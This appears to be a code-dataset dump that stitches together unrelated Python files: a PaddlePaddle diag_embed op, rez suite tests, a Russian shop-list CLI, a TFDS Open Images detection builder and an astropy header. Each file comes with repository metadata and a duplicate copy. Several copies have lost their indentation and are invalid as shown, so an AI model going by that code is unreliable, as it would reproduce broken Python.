['int32', 'int64', 'float16', 'float32', 'float64'],
'diag_embed')
input_shape = list(input.shape)
assert len(input_shape) >= 1, \
"Input must be at least 1-dimensional, " \
"But received Input's dimensional: %s.\n" % \
len(input_shape)
assert np.abs(dim1) <= len(input_shape), \
"Dim1 is out of range (expected to be in range of [%d, %d], but got %d).\n" \
% (-(len(input_shape) + 1), len(input_shape), dim1)
assert np.abs(dim2) <= len(input_shape), \
"Dim2 is out of range (expected to be in range of [%d, %d], but got %d).\n" \
% (-(len(input_shape) + 1), len(input_shape), dim2)
dim1_ = dim1 if dim1 >= 0 else len(input_shape) + dim1 + 1
dim2_ = dim2 if dim2 >= 0 else len(input_shape) + dim2 + 1
assert dim1_ != dim2_, \
"dim1 and dim2 cannot be the same dimension." \
"But received dim1 = %d, dim2 = %d\n"%(dim1, dim2)
if not in_dygraph_mode():
__check_input(input, offset, dim1, dim2)
helper = LayerHelper("diag_embed", **locals())
out = helper.create_variable_for_type_inference(dtype=input.dtype)
helper.append_op(
type='diag_embed',
inputs={'Input': [input]},
attrs={'offset': offset,
'dim1': dim1,
'dim2': dim2},
outputs={'Out': [out]})
out.stop_gradient = True
return out
| 42.785714 | 148 | 0.497663 |
import numpy as np
from ...fluid.data_feeder import check_dtype
from ...fluid.layer_helper import LayerHelper
from ...fluid.framework import Variable, in_dygraph_mode
from ...fluid.layers.tensor import assign
from ...fluid import core, dygraph_utils
from ...fluid.layers.layer_function_generator import templatedoc
from ...fluid.layers.sequence_lod import sequence_mask
def diag_embed(input, offset=0, dim1=-2, dim2=-1):
inputs = {'Input': [input]}
attrs = {'offset': offset, 'dim1': dim1, 'dim2': dim2}
if not isinstance(input, Variable):
input = assign(input)
def __check_input(input, offset, dim1, dim2):
check_dtype(input.dtype, 'Input',
['int32', 'int64', 'float16', 'float32', 'float64'],
'diag_embed')
input_shape = list(input.shape)
assert len(input_shape) >= 1, \
"Input must be at least 1-dimensional, " \
"But received Input's dimensional: %s.\n" % \
len(input_shape)
assert np.abs(dim1) <= len(input_shape), \
"Dim1 is out of range (expected to be in range of [%d, %d], but got %d).\n" \
% (-(len(input_shape) + 1), len(input_shape), dim1)
assert np.abs(dim2) <= len(input_shape), \
"Dim2 is out of range (expected to be in range of [%d, %d], but got %d).\n" \
% (-(len(input_shape) + 1), len(input_shape), dim2)
dim1_ = dim1 if dim1 >= 0 else len(input_shape) + dim1 + 1
dim2_ = dim2 if dim2 >= 0 else len(input_shape) + dim2 + 1
assert dim1_ != dim2_, \
"dim1 and dim2 cannot be the same dimension." \
"But received dim1 = %d, dim2 = %d\n"%(dim1, dim2)
if not in_dygraph_mode():
__check_input(input, offset, dim1, dim2)
helper = LayerHelper("diag_embed", **locals())
out = helper.create_variable_for_type_inference(dtype=input.dtype)
helper.append_op(
type='diag_embed',
inputs={'Input': [input]},
attrs={'offset': offset,
'dim1': dim1,
'dim2': dim2},
outputs={'Out': [out]})
out.stop_gradient = True
return out
| true | true |
7900f9757b2ab84c948d51c8026907843dc354ac | 5,805 | py | Python | vendors/rez-2.23.1-py2.7/rez/tests/test_suites.py | ColinKennedy/tk-config-default2-respawn | 855fb8033daa549b92615792442f19a7f9c4f55c | [
"Linux-OpenIB"
] | 4 | 2019-01-11T03:41:28.000Z | 2019-09-12T06:57:17.000Z | vendors/rez-2.23.1-py2.7/rez/tests/test_suites.py | ColinKennedy/tk-config-default2-respawn | 855fb8033daa549b92615792442f19a7f9c4f55c | [
"Linux-OpenIB"
] | null | null | null | vendors/rez-2.23.1-py2.7/rez/tests/test_suites.py | ColinKennedy/tk-config-default2-respawn | 855fb8033daa549b92615792442f19a7f9c4f55c | [
"Linux-OpenIB"
] | 2 | 2019-01-10T05:00:18.000Z | 2020-02-15T16:32:56.000Z | """
test suites
"""
from rez.tests.util import TestBase, TempdirMixin
from rez.resolved_context import ResolvedContext
from rez.suite import Suite
import rez.vendor.unittest2 as unittest
import uuid
import os.path
class TestRezSuites(TestBase, TempdirMixin):
@classmethod
def setUpClass(cls):
TempdirMixin.setUpClass()
path = os.path.dirname(__file__)
packages_path = os.path.join(path, "data", "suites", "packages")
cls.settings = dict(
packages_path=[packages_path],
package_filter=None,
implicit_packages=[],
warn_untimestamped=False,
resolve_caching=False)
@classmethod
def tearDownClass(cls):
TempdirMixin.tearDownClass()
def _test_serialization(self, suite):
name = uuid.uuid4().hex
path = os.path.join(self.root, name)
suite.save(path)
suite2 = Suite.load(path)
self.assertEqual(suite.get_tools(), suite2.get_tools())
self.assertEqual(set(suite.context_names), set(suite2.context_names))
def test_1(self):
"""Test empty suite."""
path = os.path.join(self.root, "suite1")
s = Suite()
tools = s.get_tools()
self.assertEqual(tools, {})
self._test_serialization(s)
def test_2(self):
"""Test basic suite."""
c_foo = ResolvedContext(["foo"])
c_bah = ResolvedContext(["bah"])
s = Suite()
s.add_context("foo", c_foo)
s.add_context("bah", c_bah)
expected_tools = set(["fooer", "bahbah", "blacksheep"])
self.assertEqual(set(s.get_tools().keys()), expected_tools)
s.set_context_prefix("foo", "fx_")
expected_tools = set(["fx_fooer", "bahbah", "blacksheep"])
self.assertEqual(set(s.get_tools().keys()), expected_tools)
s.set_context_suffix("foo", "_fun")
s.set_context_suffix("bah", "_anim")
expected_tools = set(["fx_fooer_fun", "bahbah_anim", "blacksheep_anim"])
self.assertEqual(set(s.get_tools().keys()), expected_tools)
s.remove_context("bah")
expected_tools = set(["fx_fooer_fun"])
self.assertEqual(set(s.get_tools().keys()), expected_tools)
s.add_context("bah", c_bah)
expected_tools = set(["fx_fooer_fun", "bahbah", "blacksheep"])
self.assertEqual(set(s.get_tools().keys()), expected_tools)
s.alias_tool("bah", "blacksheep", "whitesheep")
expected_tools = set(["fx_fooer_fun", "bahbah", "whitesheep"])
self.assertEqual(set(s.get_tools().keys()), expected_tools)
# explicit alias takes precedence over prefix/suffix
s.alias_tool("foo", "fooer", "floober")
expected_tools = set(["floober", "bahbah", "whitesheep"])
self.assertEqual(set(s.get_tools().keys()), expected_tools)
s.unalias_tool("foo", "fooer")
s.unalias_tool("bah", "blacksheep")
expected_tools = set(["fx_fooer_fun", "bahbah", "blacksheep"])
self.assertEqual(set(s.get_tools().keys()), expected_tools)
s.hide_tool("bah", "bahbah")
expected_tools = set(["fx_fooer_fun", "blacksheep"])
self.assertEqual(set(s.get_tools().keys()), expected_tools)
s.unhide_tool("bah", "bahbah")
expected_tools = set(["fx_fooer_fun", "bahbah", "blacksheep"])
self.assertEqual(set(s.get_tools().keys()), expected_tools)
self._test_serialization(s)
def test_3(self):
"""Test tool clashes in a suite."""
c_foo = ResolvedContext(["foo"])
c_bah = ResolvedContext(["bah"])
s = Suite()
s.add_context("foo", c_foo)
s.add_context("bah", c_bah)
s.add_context("bah2", c_bah)
expected_tools = set(["fooer", "bahbah", "blacksheep"])
self.assertEqual(set(s.get_tools().keys()), expected_tools)
self.assertEqual(s.get_tool_context("bahbah"), "bah2")
self.assertEqual(s.get_tool_context("blacksheep"), "bah2")
s.bump_context("bah")
self.assertEqual(s.get_tool_context("bahbah"), "bah")
self.assertEqual(s.get_tool_context("blacksheep"), "bah")
expected_conflicts = set(["bahbah", "blacksheep"])
self.assertEqual(set(s.get_conflicting_aliases()), expected_conflicts)
s.set_context_prefix("bah", "hey_")
expected_tools = set(["fooer", "bahbah", "blacksheep",
"hey_bahbah", "hey_blacksheep"])
self.assertEqual(set(s.get_tools().keys()), expected_tools)
s.remove_context_prefix("bah")
expected_tools = set(["fooer", "bahbah", "blacksheep"])
self.assertEqual(set(s.get_tools().keys()), expected_tools)
self.assertEqual(s.get_tool_context("bahbah"), "bah")
self.assertEqual(s.get_tool_context("blacksheep"), "bah")
s.hide_tool("bah", "bahbah")
self.assertEqual(s.get_tool_context("bahbah"), "bah2")
s.unhide_tool("bah", "bahbah")
self.assertEqual(s.get_tool_context("bahbah"), "bah")
self._test_serialization(s)
if __name__ == '__main__':
unittest.main()
# Copyright 2013-2016 Allan Johns.
#
# This library is free software: you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation, either
# version 3 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library. If not, see <http://www.gnu.org/licenses/>.
| 36.974522 | 80 | 0.641171 | from rez.tests.util import TestBase, TempdirMixin
from rez.resolved_context import ResolvedContext
from rez.suite import Suite
import rez.vendor.unittest2 as unittest
import uuid
import os.path
class TestRezSuites(TestBase, TempdirMixin):
@classmethod
def setUpClass(cls):
TempdirMixin.setUpClass()
path = os.path.dirname(__file__)
packages_path = os.path.join(path, "data", "suites", "packages")
cls.settings = dict(
packages_path=[packages_path],
package_filter=None,
implicit_packages=[],
warn_untimestamped=False,
resolve_caching=False)
@classmethod
def tearDownClass(cls):
TempdirMixin.tearDownClass()
def _test_serialization(self, suite):
name = uuid.uuid4().hex
path = os.path.join(self.root, name)
suite.save(path)
suite2 = Suite.load(path)
self.assertEqual(suite.get_tools(), suite2.get_tools())
self.assertEqual(set(suite.context_names), set(suite2.context_names))
def test_1(self):
path = os.path.join(self.root, "suite1")
s = Suite()
tools = s.get_tools()
self.assertEqual(tools, {})
self._test_serialization(s)
def test_2(self):
c_foo = ResolvedContext(["foo"])
c_bah = ResolvedContext(["bah"])
s = Suite()
s.add_context("foo", c_foo)
s.add_context("bah", c_bah)
expected_tools = set(["fooer", "bahbah", "blacksheep"])
self.assertEqual(set(s.get_tools().keys()), expected_tools)
s.set_context_prefix("foo", "fx_")
expected_tools = set(["fx_fooer", "bahbah", "blacksheep"])
self.assertEqual(set(s.get_tools().keys()), expected_tools)
s.set_context_suffix("foo", "_fun")
s.set_context_suffix("bah", "_anim")
expected_tools = set(["fx_fooer_fun", "bahbah_anim", "blacksheep_anim"])
self.assertEqual(set(s.get_tools().keys()), expected_tools)
s.remove_context("bah")
expected_tools = set(["fx_fooer_fun"])
self.assertEqual(set(s.get_tools().keys()), expected_tools)
s.add_context("bah", c_bah)
expected_tools = set(["fx_fooer_fun", "bahbah", "blacksheep"])
self.assertEqual(set(s.get_tools().keys()), expected_tools)
s.alias_tool("bah", "blacksheep", "whitesheep")
expected_tools = set(["fx_fooer_fun", "bahbah", "whitesheep"])
self.assertEqual(set(s.get_tools().keys()), expected_tools)
s.alias_tool("foo", "fooer", "floober")
expected_tools = set(["floober", "bahbah", "whitesheep"])
self.assertEqual(set(s.get_tools().keys()), expected_tools)
s.unalias_tool("foo", "fooer")
s.unalias_tool("bah", "blacksheep")
expected_tools = set(["fx_fooer_fun", "bahbah", "blacksheep"])
self.assertEqual(set(s.get_tools().keys()), expected_tools)
s.hide_tool("bah", "bahbah")
expected_tools = set(["fx_fooer_fun", "blacksheep"])
self.assertEqual(set(s.get_tools().keys()), expected_tools)
s.unhide_tool("bah", "bahbah")
expected_tools = set(["fx_fooer_fun", "bahbah", "blacksheep"])
self.assertEqual(set(s.get_tools().keys()), expected_tools)
self._test_serialization(s)
def test_3(self):
c_foo = ResolvedContext(["foo"])
c_bah = ResolvedContext(["bah"])
s = Suite()
s.add_context("foo", c_foo)
s.add_context("bah", c_bah)
s.add_context("bah2", c_bah)
expected_tools = set(["fooer", "bahbah", "blacksheep"])
self.assertEqual(set(s.get_tools().keys()), expected_tools)
self.assertEqual(s.get_tool_context("bahbah"), "bah2")
self.assertEqual(s.get_tool_context("blacksheep"), "bah2")
s.bump_context("bah")
self.assertEqual(s.get_tool_context("bahbah"), "bah")
self.assertEqual(s.get_tool_context("blacksheep"), "bah")
expected_conflicts = set(["bahbah", "blacksheep"])
self.assertEqual(set(s.get_conflicting_aliases()), expected_conflicts)
s.set_context_prefix("bah", "hey_")
expected_tools = set(["fooer", "bahbah", "blacksheep",
"hey_bahbah", "hey_blacksheep"])
self.assertEqual(set(s.get_tools().keys()), expected_tools)
s.remove_context_prefix("bah")
expected_tools = set(["fooer", "bahbah", "blacksheep"])
self.assertEqual(set(s.get_tools().keys()), expected_tools)
self.assertEqual(s.get_tool_context("bahbah"), "bah")
self.assertEqual(s.get_tool_context("blacksheep"), "bah")
s.hide_tool("bah", "bahbah")
self.assertEqual(s.get_tool_context("bahbah"), "bah2")
s.unhide_tool("bah", "bahbah")
self.assertEqual(s.get_tool_context("bahbah"), "bah")
self._test_serialization(s)
if __name__ == '__main__':
unittest.main()
| true | true |
7900fa4748b918b5153b94375a25c9bc355d756a | 2,466 | py | Python | pythonProject/ind.py | surai5a/laba_2_6 | dab2f35f3dca88620c08c438b85cfd64f9b2172b | [
"MIT"
] | null | null | null | pythonProject/ind.py | surai5a/laba_2_6 | dab2f35f3dca88620c08c438b85cfd64f9b2172b | [
"MIT"
] | null | null | null | pythonProject/ind.py | surai5a/laba_2_6 | dab2f35f3dca88620c08c438b85cfd64f9b2172b | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
if __name__ == '__main__':
goods = []
while True:
command = input(">>> ").lower()
if command == 'exit':
break
elif command == 'add':
name = input("Название товара: ")
shop = input("Название магазина: ")
price = float(input("Стоимость: "))
good = {
'name': name,
'shop': shop,
'price': price,
}
goods.append(good)
# Отсортировать список в случае необходимости.
if len(goods) > 1:
goods.sort(key=lambda item: item.get('shop', ''))
elif command == 'list':
line = '+-{}-+-{}-+-{}-+-{}-+'.format(
'-' * 4,
'-' * 30,
'-' * 20,
'-' * 8
)
print(line)
print(
'| {:^4} | {:^30} | {:^20} | {:^8} |'.format(
"№",
"Название",
"Магазин",
"Цена"
)
)
print(line)
for idx, good in enumerate(goods, 1):
print(
'| {:>4} | {:<30} | {:<20} | {:>8} |'.format(
idx,
good.get('name', ''),
good.get('shop', ''),
good.get('price', 0)
)
)
print(line)
elif command.startswith('select '):
parts = command.split(' ', maxsplit=1)
shopName = parts[1]
count = 0
for good in goods:
if shopName == good.get('shop', shopName):
count += 1
print(
'{:>4}: {}'.format(count, good.get('name', ''))
)
if count == 0:
print("Такого магазина не существует либо нет товаров.")
elif command == 'help':
print("Список команд:\n")
print("add - добавить товар;")
print("list - вывести список товаров;")
print("select <имя магазина> - запросить товары магазина;")
print("help - отобразить справку;")
print("exit - завершить работу с программой.")
else:
print(f"Неизвестная команда {command}", file=sys.stderr) | 29.011765 | 72 | 0.37794 |
import sys
if __name__ == '__main__':
goods = []
while True:
command = input(">>> ").lower()
if command == 'exit':
break
elif command == 'add':
name = input("Название товара: ")
shop = input("Название магазина: ")
price = float(input("Стоимость: "))
good = {
'name': name,
'shop': shop,
'price': price,
}
goods.append(good)
if len(goods) > 1:
goods.sort(key=lambda item: item.get('shop', ''))
elif command == 'list':
line = '+-{}-+-{}-+-{}-+-{}-+'.format(
'-' * 4,
'-' * 30,
'-' * 20,
'-' * 8
)
print(line)
print(
'| {:^4} | {:^30} | {:^20} | {:^8} |'.format(
"№",
"Название",
"Магазин",
"Цена"
)
)
print(line)
for idx, good in enumerate(goods, 1):
print(
'| {:>4} | {:<30} | {:<20} | {:>8} |'.format(
idx,
good.get('name', ''),
good.get('shop', ''),
good.get('price', 0)
)
)
print(line)
elif command.startswith('select '):
parts = command.split(' ', maxsplit=1)
shopName = parts[1]
count = 0
for good in goods:
if shopName == good.get('shop', shopName):
count += 1
print(
'{:>4}: {}'.format(count, good.get('name', ''))
)
if count == 0:
print("Такого магазина не существует либо нет товаров.")
elif command == 'help':
print("Список команд:\n")
print("add - добавить товар;")
print("list - вывести список товаров;")
print("select <имя магазина> - запросить товары магазина;")
print("help - отобразить справку;")
print("exit - завершить работу с программой.")
else:
print(f"Неизвестная команда {command}", file=sys.stderr) | true | true |
7900fc68e356ecdd74f17c5a5d271da9a0f3d240 | 8,015 | py | Python | tensorflow_datasets/object_detection/open_images_challenge2019.py | shashwat9kumar/datasets | 99b055408025f8e934fcbb0fc054488aa087ebfb | [
"Apache-2.0"
] | 1 | 2019-07-19T15:01:45.000Z | 2019-07-19T15:01:45.000Z | tensorflow_datasets/object_detection/open_images_challenge2019.py | shashwat9kumar/datasets | 99b055408025f8e934fcbb0fc054488aa087ebfb | [
"Apache-2.0"
] | null | null | null | tensorflow_datasets/object_detection/open_images_challenge2019.py | shashwat9kumar/datasets | 99b055408025f8e934fcbb0fc054488aa087ebfb | [
"Apache-2.0"
] | 1 | 2021-08-02T22:12:40.000Z | 2021-08-02T22:12:40.000Z | # coding=utf-8
# Copyright 2021 The TensorFlow Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Datasets of the Open Images Challange 2019.
https://storage.googleapis.com/openimages/web/challenge2019.html
"""
import abc
import tensorflow.compat.v2 as tf
import tensorflow_datasets.public_api as tfds
_DESCRIPTION = """\
Open Images is a collaborative release of ~9 million images annotated with
image-level labels, object bounding boxes, object segmentation masks, and
visual relationships. This uniquely large and diverse dataset is designed to
spur state of the art advances in analyzing and understanding images.
"""
_DESCRIPTION_DETECTION = """\
This contains the data from thee Object Detection track of the competition.
The goal in this track is to predict a tight bounding box around all object
instances of 500 classes.
The images are annotated with positive image-level labels, indicating certain
object classes are present, and with negative image-level labels, indicating
certain classes are absent. In the competition, all other unannotated classes
are excluded from evaluation in that image. For each positive image-level label
in an image, every instance of that object class in the image was annotated.
"""
_URL = "https://storage.googleapis.com/openimages/web/challenge2019.html"
_GOOGLE_URL_PREFIX = (
"https://storage.googleapis.com/openimages/challenge_2019/challenge-2019-")
_FIGURE_EIGHT_BASE_URL = (
"https://datasets.figure-eight.com/figure_eight_datasets/open-images/")
_TRAIN_IMAGES_URLS = [
"{}zip_files_copy/train_{:02d}.zip".format(_FIGURE_EIGHT_BASE_URL, n)
for n in range(9)
]
_VALIDATION_IMAGES_URL = (
_FIGURE_EIGHT_BASE_URL + "zip_files_copy/validation.zip")
_TEST_IMAGES_URL = _FIGURE_EIGHT_BASE_URL + "test_challenge.zip"
_NUM_CLASSES = 500
class OpenImagesChallenge2019Config(tfds.core.BuilderConfig):
"""BuilderConfig for OpenImages Challenge 2019 datasets."""
def __init__(self, target_pixels=None, **kwargs):
kwargs.setdefault("version", tfds.core.Version("1.0.0"))
super(OpenImagesChallenge2019Config, self).__init__(**kwargs)
self._target_pixels = target_pixels
@property
def target_pixels(self):
return self._target_pixels
class _OpenImagesChallenge2019(tfds.core.BeamBasedBuilder):
  """Abstract Beam-based builder shared by the Challenge 2019 tracks."""
  BUILDER_CONFIGS = [
      OpenImagesChallenge2019Config(
          name="200k",
          description="Images have at most 200,000 pixels, at 72 JPEG quality.",
          target_pixels=200000),
      OpenImagesChallenge2019Config(
          name="300k",
          description="Images have at most 300,000 pixels, at 72 JPEG quality.",
          target_pixels=300000),
  ]
  @property
  @abc.abstractmethod
  def annotation_urls(self):
    """Mapping handed to the DownloadManager to fetch annotations.

    Subclasses return a dict whose values are annotation URLs and whose keys
    are short identifiers for those URLs, e.g.::

        {"test_annotations": "https://somewebpage.com/data/openimages/test.txt"}
    """
  def _split_generators(self, dl_manager):
    """Downloads images plus annotations and yields one generator per split."""
    # Image archives first, then whatever annotations the subclass requires.
    urls = dict(
        train_images=_TRAIN_IMAGES_URLS,
        test_images=[_TEST_IMAGES_URL],
        validation_images=[_VALIDATION_IMAGES_URL])
    urls.update(self.annotation_urls)
    paths = dl_manager.download(urls)
    split_specs = [
        (tfds.Split.TRAIN, "train"),
        (tfds.Split.TEST, "test"),
        (tfds.Split.VALIDATION, "validation"),
    ]
    return [
        tfds.core.SplitGenerator(
            name=split_name,
            gen_kwargs=dict(paths=paths, split=split_key),
        )
        for split_name, split_key in split_specs
    ]
class OpenImagesChallenge2019Detection(_OpenImagesChallenge2019):
  """Dataset for the Detection Track."""
  @property
  def annotation_urls(self):
    # Short name -> URL for every annotation file this track needs; merged
    # into the DownloadManager request by the base class.
    return {
        "train_image_label":
            _GOOGLE_URL_PREFIX + "train-detection-human-imagelabels.csv",
        "train_boxes":
            _GOOGLE_URL_PREFIX + "train-detection-bbox.csv",
        "validation_image_label":
            _GOOGLE_URL_PREFIX + "validation-detection-human-imagelabels.csv",
        "validation_boxes":
            _GOOGLE_URL_PREFIX + "validation-detection-bbox.csv",
        "classes":
            _GOOGLE_URL_PREFIX + "classes-description-500.csv",
        "hierarchy":
            _GOOGLE_URL_PREFIX + "label500-hierarchy.json",
    }
  def _info(self):
    """Returns the `tfds.core.DatasetInfo` describing this track's features."""
    label = tfds.features.ClassLabel(num_classes=_NUM_CLASSES)
    return tfds.core.DatasetInfo(
        builder=self,
        description=_DESCRIPTION + "\n\n" + _DESCRIPTION_DETECTION,
        features=tfds.features.FeaturesDict({
            "id":
                tfds.features.Text(),
            "image":
                tfds.features.Image(),
            # A sequence of image-level labels.
            "objects":
                tfds.features.Sequence({
                    "label": label,
                    # All labels have been verified by humans.
                    # - If confidence is 1.0, the object IS in the image.
                    # - If confidence is 0.0, the object is NOT in the image.
                    "confidence": tf.float32,
                    "source": tfds.features.Text(),
                }),
            # A sequence of bounding boxes.
            "bobjects":
                tfds.features.Sequence({
                    "label": label,
                    "bbox": tfds.features.BBoxFeature(),
                    "is_group_of": tf.bool,
                }),
        }),
        homepage=_URL,
    )
  def _build_pcollection(self, pipeline, paths, split):
    """Builds the Beam PCollection of examples for the given split."""
    beam = tfds.core.lazy_imports.apache_beam
    # We need to lazily import the oi_beam module (and thus, violate the
    # "imports only at the top" rule), so that beam is only required during the
    # generation of the dataset, and not to use the dataset itself (once built).
    # See: https://www.tensorflow.org/datasets/beam_datasets.
    import tensorflow_datasets.object_detection.open_images_challenge2019_beam as oi_beam  # pylint: disable=g-import-not-at-top,import-outside-toplevel
    if split == "test":
      # Note: annotations are not available for the test split.
      generate_examples_kwargs = dict(
          image_labels_filepath=None,
          box_labels_filepath=None,
          hierarchy_filepath=None,
          classes_filepath=None,
      )
    else:
      generate_examples_kwargs = dict(
          image_labels_filepath=paths["{}_image_label".format(split)],
          box_labels_filepath=paths["{}_boxes".format(split)],
          hierarchy_filepath=paths["hierarchy"],
          classes_filepath=paths["classes"],
      )
    # Fill class names after the data has been downloaded.
    oi_beam.fill_class_names_in_tfds_info(paths["classes"], self.info.features)
    return (pipeline | beam.Create(paths["{}_images".format(split)])
            | "ReadImages" >> beam.ParDo(oi_beam.ReadZipFn())
            | "ProcessImages" >> beam.ParDo(
                oi_beam.ProcessImageFn(
                    target_pixels=self.builder_config.target_pixels,
                    jpeg_quality=72))
            | "GenerateExamples" >> beam.ParDo(
                oi_beam.CreateDetectionExampleFn(**generate_examples_kwargs)))
| 38.533654 | 152 | 0.675234 |
import abc
import tensorflow.compat.v2 as tf
import tensorflow_datasets.public_api as tfds
_DESCRIPTION = """\
Open Images is a collaborative release of ~9 million images annotated with
image-level labels, object bounding boxes, object segmentation masks, and
visual relationships. This uniquely large and diverse dataset is designed to
spur state of the art advances in analyzing and understanding images.
"""
_DESCRIPTION_DETECTION = """\
This contains the data from thee Object Detection track of the competition.
The goal in this track is to predict a tight bounding box around all object
instances of 500 classes.
The images are annotated with positive image-level labels, indicating certain
object classes are present, and with negative image-level labels, indicating
certain classes are absent. In the competition, all other unannotated classes
are excluded from evaluation in that image. For each positive image-level label
in an image, every instance of that object class in the image was annotated.
"""
_URL = "https://storage.googleapis.com/openimages/web/challenge2019.html"
_GOOGLE_URL_PREFIX = (
"https://storage.googleapis.com/openimages/challenge_2019/challenge-2019-")
_FIGURE_EIGHT_BASE_URL = (
"https://datasets.figure-eight.com/figure_eight_datasets/open-images/")
_TRAIN_IMAGES_URLS = [
"{}zip_files_copy/train_{:02d}.zip".format(_FIGURE_EIGHT_BASE_URL, n)
for n in range(9)
]
_VALIDATION_IMAGES_URL = (
_FIGURE_EIGHT_BASE_URL + "zip_files_copy/validation.zip")
_TEST_IMAGES_URL = _FIGURE_EIGHT_BASE_URL + "test_challenge.zip"
_NUM_CLASSES = 500
class OpenImagesChallenge2019Config(tfds.core.BuilderConfig):
  """BuilderConfig for OpenImages Challenge 2019 datasets."""
  def __init__(self, target_pixels=None, **kwargs):
    """Stores the pixel budget; all other kwargs go to BuilderConfig."""
    # Default the config version unless the caller pinned one.
    kwargs.setdefault("version", tfds.core.Version("1.0.0"))
    super(OpenImagesChallenge2019Config, self).__init__(**kwargs)
    self._target_pixels = target_pixels
  @property
  def target_pixels(self):
    """Maximum number of pixels kept per image, or None for no limit."""
    return self._target_pixels
class _OpenImagesChallenge2019(tfds.core.BeamBasedBuilder):
  """Base abstract class for Open Images Challenge 2019 datasets."""
  BUILDER_CONFIGS = [
      OpenImagesChallenge2019Config(
          name="200k",
          description="Images have at most 200,000 pixels, at 72 JPEG quality.",
          target_pixels=200000),
      OpenImagesChallenge2019Config(
          name="300k",
          description="Images have at most 300,000 pixels, at 72 JPEG quality.",
          target_pixels=300000),
  ]
  @property
  @abc.abstractmethod
  def annotation_urls(self):
    # BUG FIX: this abstract method previously had no body at all (the
    # docstring-only body was stripped), which is a SyntaxError in Python.
    # A docstring body restores valid syntax without changing behavior.
    """Dictionary passed to the DownloadManager to download annotations.

    Returns:
      A dictionary whose values are the URLs to download the annotations of
      the dataset, and the keys are short strings identifying each URL.
    """
  def _split_generators(self, dl_manager):
    """Downloads images plus annotations and defines the three splits."""
    urls = {
        "train_images": _TRAIN_IMAGES_URLS,
        "test_images": [_TEST_IMAGES_URL],
        "validation_images": [_VALIDATION_IMAGES_URL]
    }
    urls.update(self.annotation_urls)
    paths = dl_manager.download(urls)
    return [
        tfds.core.SplitGenerator(
            name=tfds.Split.TRAIN,
            gen_kwargs=dict(paths=paths, split="train"),
        ),
        tfds.core.SplitGenerator(
            name=tfds.Split.TEST,
            gen_kwargs=dict(paths=paths, split="test"),
        ),
        tfds.core.SplitGenerator(
            name=tfds.Split.VALIDATION,
            gen_kwargs=dict(paths=paths, split="validation"),
        ),
    ]
class OpenImagesChallenge2019Detection(_OpenImagesChallenge2019):
  """Dataset for the Detection Track."""
  @property
  def annotation_urls(self):
    # Short name -> URL for every annotation file this track needs.
    return {
        "train_image_label":
            _GOOGLE_URL_PREFIX + "train-detection-human-imagelabels.csv",
        "train_boxes":
            _GOOGLE_URL_PREFIX + "train-detection-bbox.csv",
        "validation_image_label":
            _GOOGLE_URL_PREFIX + "validation-detection-human-imagelabels.csv",
        "validation_boxes":
            _GOOGLE_URL_PREFIX + "validation-detection-bbox.csv",
        "classes":
            _GOOGLE_URL_PREFIX + "classes-description-500.csv",
        "hierarchy":
            _GOOGLE_URL_PREFIX + "label500-hierarchy.json",
    }
  def _info(self):
    """Returns the `tfds.core.DatasetInfo` describing this track's features."""
    label = tfds.features.ClassLabel(num_classes=_NUM_CLASSES)
    return tfds.core.DatasetInfo(
        builder=self,
        description=_DESCRIPTION + "\n\n" + _DESCRIPTION_DETECTION,
        features=tfds.features.FeaturesDict({
            "id":
                tfds.features.Text(),
            "image":
                tfds.features.Image(),
            # Image-level labels; confidence 1.0 means the object IS present,
            # 0.0 means it is NOT present (human-verified).
            "objects":
                tfds.features.Sequence({
                    "label": label,
                    "confidence": tf.float32,
                    "source": tfds.features.Text(),
                }),
            # Box-level annotations.
            "bobjects":
                tfds.features.Sequence({
                    "label": label,
                    "bbox": tfds.features.BBoxFeature(),
                    "is_group_of": tf.bool,
                }),
        }),
        homepage=_URL,
    )
  def _build_pcollection(self, pipeline, paths, split):
    """Builds the Beam PCollection of examples for the given split."""
    beam = tfds.core.lazy_imports.apache_beam
    # Lazy import so apache_beam is only required while generating the
    # dataset, not when merely reading an already-built one.
    import tensorflow_datasets.object_detection.open_images_challenge2019_beam as oi_beam  # pylint: disable=g-import-not-at-top,import-outside-toplevel
    if split == "test":
      # Annotations are not available for the test split.
      generate_examples_kwargs = dict(
          image_labels_filepath=None,
          box_labels_filepath=None,
          hierarchy_filepath=None,
          classes_filepath=None,
      )
    else:
      generate_examples_kwargs = dict(
          image_labels_filepath=paths["{}_image_label".format(split)],
          box_labels_filepath=paths["{}_boxes".format(split)],
          hierarchy_filepath=paths["hierarchy"],
          classes_filepath=paths["classes"],
      )
    # Fill class names after the data has been downloaded.
    oi_beam.fill_class_names_in_tfds_info(paths["classes"], self.info.features)
    return (pipeline | beam.Create(paths["{}_images".format(split)])
            | "ReadImages" >> beam.ParDo(oi_beam.ReadZipFn())
            | "ProcessImages" >> beam.ParDo(
                oi_beam.ProcessImageFn(
                    target_pixels=self.builder_config.target_pixels,
                    jpeg_quality=72))
            | "GenerateExamples" >> beam.ParDo(
                oi_beam.CreateDetectionExampleFn(**generate_examples_kwargs)))
| true | true |
7900fd070912f7dd0c815ddd24ef926641ec5983 | 31,863 | py | Python | astropy/coordinates/spectral_coordinate.py | ysBach/astropy | 10d27d8292bafb3ab502f4147dd707473e69af71 | [
"BSD-3-Clause"
] | 4 | 2021-03-25T15:49:56.000Z | 2021-12-15T09:10:04.000Z | astropy/coordinates/spectral_coordinate.py | ysBach/astropy | 10d27d8292bafb3ab502f4147dd707473e69af71 | [
"BSD-3-Clause"
] | 20 | 2021-05-03T18:02:23.000Z | 2022-03-12T12:01:04.000Z | Lib/site-packages/astropy/coordinates/spectral_coordinate.py | fochoao/cpython | 3dc84b260e5bced65ebc2c45c40c8fa65f9b5aa9 | [
"bzip2-1.0.6",
"0BSD"
] | 3 | 2021-03-28T16:13:00.000Z | 2021-07-16T10:27:25.000Z | import warnings
